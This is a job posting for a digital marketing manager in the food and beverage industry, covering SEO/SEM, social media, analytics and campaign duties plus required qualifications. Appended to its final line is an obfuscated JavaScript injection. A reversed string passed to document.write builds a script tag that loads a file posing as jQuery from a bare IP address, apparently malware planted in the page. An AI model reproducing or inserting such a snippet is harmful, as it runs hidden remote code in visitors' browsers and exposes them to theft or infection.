Industry : F&B
– Plan and execute all digital marketing, including SEO/SEM, marketing database, email, social media and display advertising campaigns.
– Design, build and maintain our social media presence.
– Measure and report performance of all digital marketing campaigns, and assess against goals (ROI and KPIs)
– Identify trends and insights, and optimize spend and performance based on the insights
– Brainstorm new and creative growth strategies
– Plan, execute, and measure experiments and conversion tests
– Collaborate with internal teams to create landing pages and optimize user experience
– Utilize strong analytical ability to evaluate end-to-end customer experience across multiple channels and customer touch points.
– Instrument conversion points and optimize user funnels.
– Collaborate with agencies and other vendor partners.
– Evaluate emerging technologies. Provide thought leadership and perspective for adoption where appropriate.
– Possess the Bachelor Degree in marketing or a related field.
– Proven working experience in digital marketing.
– Demonstrable experience leading and managing SEO/SEM, marketing database, email, social media and/or display advertising campaigns.
– Highly creative with experience in identifying target audiences and devising digital campaigns that engage, inform and motivate.
– Experience in optimizing landing pages and user funnels.
– Experience with A/B and multivariate experiments.
– Solid knowledge of website analytics tools (e.g., Google Analytics, NetInsight, Omniture, WebTrends).
– Working knowledge of ad serving tools (e.g., DART, Atlas).
– Experience in setting up and optimizing Google Adwords campaigns.
– Strong analytical skills and data-driven thinking.
– Up-to-date with the latest trends and best practices in online marketing and measurement. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))